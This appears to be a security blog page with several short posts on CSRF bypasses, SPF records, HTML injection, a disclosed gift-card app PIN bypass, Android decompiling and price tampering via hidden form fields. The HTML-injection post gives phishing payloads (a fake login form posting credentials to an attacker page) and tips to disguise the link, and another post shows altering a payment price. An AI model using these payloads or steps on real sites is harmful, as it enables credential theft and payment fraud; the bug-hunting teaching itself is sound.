latest articles

Bypassing the weak CSRF Protection

Hi there,

So in InfoSec community everybody knows about the CSRF vulnerability.
And if the website is not using the CSRF protection they are lucky to find the Full account takeover using the CSRF.

However many of Security Researcher only look if there is a CSRF token present on a particular request or not. And if it was not they think that this particular request is vulnerable to CSRF.

Protection which Modern WebApp uses against CSRF

So there are many protection which modern WebApp use against CSRF.

1. Send an Authenticity token which each request:- So this is the basic protection which most of WebApp use. They send a Authenticity token with each request to protect their users against CSRF.

2. X-CSRF Token:- Many Webapp use this extra layer of protection by adding a X-CSRF token header with each request the token in the header is verified on every request sent to server.
3. Referrer Header Protection:- You can only find this type of CSRF protection in some of the WebApp like Twitter. In this type of protection they verify the referrer header and if the referrer header is coming from any other domain besides the domain of the Website. It drops the request and shows an error.


Some Methods to Bypass the CSRF protection

There are some methods which you can use to bypass the csrf protection

1. There are many webapp which only verifies the length of the CSRF token which means create an account on that website and note down the length of the CSRF token. Now SEnd any arbitrary CSRF token of the same length and it will get accepted.

2. You can also use GET method instead of POST method to bypass CSRF protection.

3. There is missing best practice in many of the website. After logging in they generate a CSRF token for us and this token remains same on every request until we do logout. But if we note down the same token and try a CSRF attack on any other persons account it will be successful.
So from my opinion CSRF token should have to be unique per use and they have to expire after use does the logout.

4. There is also a flaw exists which makes many Webapp vulnerable which generates the CSRF token and then save them to cookie and on each and every request they verifies the token in the POST request with the token in the cookie.
So it is easy to bypass this type of protection just change both token one which is inside the cookie and the other which is sent to the server on every request. And the request will be successful.
SO to mitigation  you dont have to just match the token with the token in the cookie.

Suggestion are welcome


Thanks 

Jitendra K Singh(Team Computer Korner)


Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

Missing SPF record: Vulnerability Or Not ?






Hi Followers ,
First of all sorry for the delay in the new post.

So this post is about SPF(Sender Policy Framework) record I am writing this post because many bug hunter thinks this a simple and common vulnerability. But as my perspective this is not a security issue at all.
Many security researchers who want to make easy money by doing bug hunting reports this first to any website which have a bug bounty program and in 1 or 2 hour there will be about 30-40 reports which are about the SPF records.

What are SPF records ?

So basically Sender Policy Framework  records are used when you want to allow some third party service to send emails on behalf of your domain. The purpose of adding these records to prevent malicious users from sending the forged email from your domain. 

But there is an exception only SPF records cant prevent malicious users from sending the email from your domain but you also have to add DMARC record. I have written a Post about this and you can find it Here.

The SPF record of a domain looks like this one 
v=spf1 include:_spf.google.com ~all 

Here there are two syntax of defining all one is 
1. ~all: It is used for softfail
2. -all: It is used for hardfail

So basically checking of SPF record is MTA in-exclusive if there is no  SPF record it checks the MX record of the domain. As I also stated above that they are only necessary if you want to allow a third party service to send emails on behalf of your domain.

And if you are not using any third party service then you don't have to add the SPF records.

Missing SPF records doesn't pose a security risk at all.  
However to prevent the spamming from a particular domain you also have to define the DMARC records.
DMARC records dictates the mail policy of any domain mainly if the DMARC records are added then you can say that the SPF records will have those domain which will be used for sending the emails on the behalf of that domain and if someone tries to spoof the email from a third party service which is not defined in the SPF record the mail will be rejected or will be marked as spam by the mail servers


Hope this post helped you. 
If you have any suggestion that how can we make this blog more interesting or you have question about this post then feel free to comment.


Cheers
Jitendra (Team Computer Korner)


Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

WebApp Pentesting:What is HTML Injection


Hi Everyone 

So In this post we will talk about HTML injection.

HTML injection is similar to Cross Site Scripting (XSS) attack. But in XSS we insert malicious Script Tags to run JavaScript but in HTML injection we use HTML tag in order to modify the page for malicious purposes.


Why HTML injection Happens ?

When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.

So to demonstrate this I have hosted a vulnerable webpage on http://htmli.comlu.com/html.php
When you visit to this page you can see that on that webpage it says
Hi Mr  Thanks for looking here
Now you can give a parameter to this by just adding ?name=ANY_HTML_VAlue so the final url will be
http://htmli.comlu.com/html.php?name=ANY_VALUE.

lets try to exploit it.

here first we will put some content in <b> tag
use this url and you can see that some text is in dark black http://htmli.comlu.com/html.php?name=<b>html-injection</b>

Redirecting user to malicious site 

http://htmli.comlu.com/html.php?name=<a href="evilsite.com">Click here to login</a>

Creating a Fake login form

http://htmli.comlu.com/html.php?name=<form action="evilform.php" method="post"><input type="text" name="user" placeholder="username"></br><input type="password" name="pass" placeholder="pass"><!--
I used comment tag in the last of the form so all other content of the form will be commented out and that will not be displayed on the page.

Displaying a Fake Message

To display a fake message you can use this http://htmli.comlu.com/html.php?name=<p>we have changed our website login page please go to evilsite.com for login</p>


So the question is if we send this url to a use he will get to know that we are doing an phishing attack on him.
So you can encode the url or you can shorten the url using any of the url short service like goo.gl


Thats All for this post 
Hope you enjoyed it.

Suggestion are welcome. Please do comment below for your feedback.


Thanks
Jitendra Kumar Singh(Team Computer Korner)
 
Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

Bypassing Four digit Pin lock Of GiftCards.com Mobile App





Hi Everyone,

This post is about a simple vulnerability by Which I am able to bypass the 4 Digit Pin lock on GiftCards.com android app.

Description 

So GiftCards.com android app let you set a 4 digit pin. This pin is secure your account from the intruders.Evertime you open the app , you have to enter the 4 digit pin in order to access the account.
And there is also rate limiting on place that if you try to brute force the pin it logs you out and then in order to access the account you have to sign in again.
But by a simple vulnerability I can bypass the 4 digit pin.

How I am able to Bypass it

So the exploit is very simple here.
You have to remember a things that after entering wrong pin 5 times it will log you out.
Now lets start since you have the physical access of the device.
Configure Burp to intercept all the traffic from you mobile device. Now open the app it will ask you for the password.

When you open the app a request like this will pass through the burp 


The pin is not entered at this time.

Now enter the wrong pin since as i mentioned you have 5 chances to enter the pin.
so if you enter a wrong pin.
You will see a response like this 


You Can easily see that the pin is mentioned in the response.
I can easily bypass the 4 digit pin countermeasure and can access the private info like credit card info , Gift cards purchased and many other things.

P.S: My device is not rooted and I never perform tests on a rooted device. Since rooting a device removes the most important security feature of the android.

Hope you enjoyed it let me know your thinking about this in comments.

Reported to Giftcards.com security team on January 19 2016
No response from the team.
Disclosed on March 27 2016

Thanks
Jitendra Kumar Singh (Team Computer- Korner)


Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

Exploring Android: How to Read the AndroidManifest.xml file





Hi Everyone,

In the last post of exploring android we talked about How to decompile an Android App using dex2jar and JD-GUI.
but what if you want to read its AndroidManifest.xml or you need other files like images and many others.
There is also a way by which you can read these files Like AndroidManifest.xml file in order to get all the activities and the content provider exported.

So to get all these files and folder mentioned in this post then there is a tool which you can use.
to the name of the tool is apktool. You can download this tool from Here.
After downloading the file paste it in a new folder.

Steps to Decompile 

  1. First of all copy the apktool in a separate folder and paste the android apk which you want to decompile in the same folder where you placed the APKtool.
  2. Now open command prompt in the same folder. You can do it by pressing the shift with a right click.
  3. Now give this command in the command prompt java -jar apktool.jar androidPackagename.apk
  4. A new folder will be created there with the name same as the package name of the android apk.
  5. Now you can easily read all the files like AndroidManifest.xml files as well.

If you need more info about this you can comment below and if you want a video showing this you can post that in comments as well.

Thanks
Jitendra K Singh (Team Computer-Korner) 



Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

Hidden HTML Tag: How they Can Lead to A Severe Vulnerability


Hi there

So this post is about how the hidden html tags can lead to a severe vulnerability.


What are Hidden HTML tags ?

The basic syntax of defining a hidden html tag is <input type="hidden" name="any_name" value="value">
this is highly used by the developers to define the CSRF token in the forms. However sometimes hidden HTML tag can lead to a severe vulnerability.

How this can lead to a Severe vulnerability ?

Some days ago I was testing for vulnerabilities in a website. On this website we can upload Images and then we can share them with other or we can make our private album.
So they also have paid plan which gives more storage.

I checked there plans there is a plan of 18Euro per year. they are also providing Paypal to pay.
However the price of the subscription was introduced in the hidden html tags. so this catches my attention.

You can use two methods for exploiting this

1. You can use Chrome developers tools open the inspect element there will a line of code like this
<input type="hidden" value="18" name="a3"> what you have to do just change the value to any of your desireda like 1 or anything you want.

2. You can use burp intercept the request and change the value of a3 and forward the request. and It will be done.

So what the conclusion is you have dont have to define the price in the hidden html tag and you do this then you have to apply some other restrictions like matching the price when the payment is made etc.


Thats all for this post 
Suggestion are welcome 


Thanks 
Jitendra Santram Singh (Team Computer Korner ) 



Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

Exploring Android:De-compiling An Android APK





H again 

So in last post we have talked about what is an Android APK.
So in this post we will talk about how to decompile an Android APK.
So in order to decompile an Android APK there are two tool which we will use

1. Dex2jar: this is used to convert the android app in JAR format you can download it from here.
2. JD-GUI:This is used to display the source code of .class file.
you can download it from here
So lets start

  • Download the both the tools from the given link and extract dex2jar in a folder.
  • Now there will be several file in the Dex2Jar folder two files are important dex2jar.bat this is used for windows and dex2jar.sh this is used for Linux based OS
  • Now copy the android apk in the dex2jar folder and open the command prompt in the same location.
  • Now in command prompt type 
dex2jar.bat  android_package_name 
and then press enter 

  • After this a new file will be created in the same folder with the extension .jar.
  • Now open the JD-GUI and click on open new file , then select the .jar file you created above.
  • Now you can able to see the source code of the APK.

This is a very simple thing you can do this easily but still if you need a video demonstration let me know I will upload a video for this.

Special thanks Gurpreet Singh

Thanks 
Jitendra Santram Singh (Team Computer Korner)



Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

Exploring Android: What is an Android APK




Hi ,

In past days I am busy in learning a new things so here is I am with a New Post

So Android OS is used by most of the people So i thought I have to write some posts on android app components.So today I will explore What is an Android APK and what it consist of. So lets Start.


What is an Android App

So Android Apps are basically compressed zip files You can easily extract them by changing the extension from APK to zip.
After extracting it , The APK consist of 6 folders and files these are 


  1. res
  2. META-INF
  3. assets
  4. resources.arsc
  5. classes.dex
  6. AndroidManifest.xml
So I will elborate what these files and folder consist of


  • res : This folder consist the resources for the Android App Like images xml files layout and many other resources which is used to make the Android app Like You added some logo or other resources.
  • META-INF: The META-INF folder is the home fort the MANIFEST.MF file. This file contains meta data about the contents of the JAR. For example, there is an entry called Main-Class that specifies the name of the Java class with the static main() for executable JAR files.
  • assests: This folder contains the Raw Approach to resource management.
  • resources.arsc: ARSC, or application resource files, are used by programs developed for the Google Android mobile operating system. They contain compiled resources in a binary format, and may include images, strings, or other data used by the program, usually included in an APK package file.
  • classes.dex: This Holds the Program codes.
  • AndroidManifest.xml: This contains the permission and the content uri paths and Services exported and activities.


So After Just de-compiling we get encoded AndroidManifest.xml file

So In  next post we will discuss how to decode the encoded AnroidManifest.xml.

Thats all for this post

Special Thanks to Gurpreet Singh 
Stay tuned 

Cheers
Jitendra K Singh(Team Computer Korner)

Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more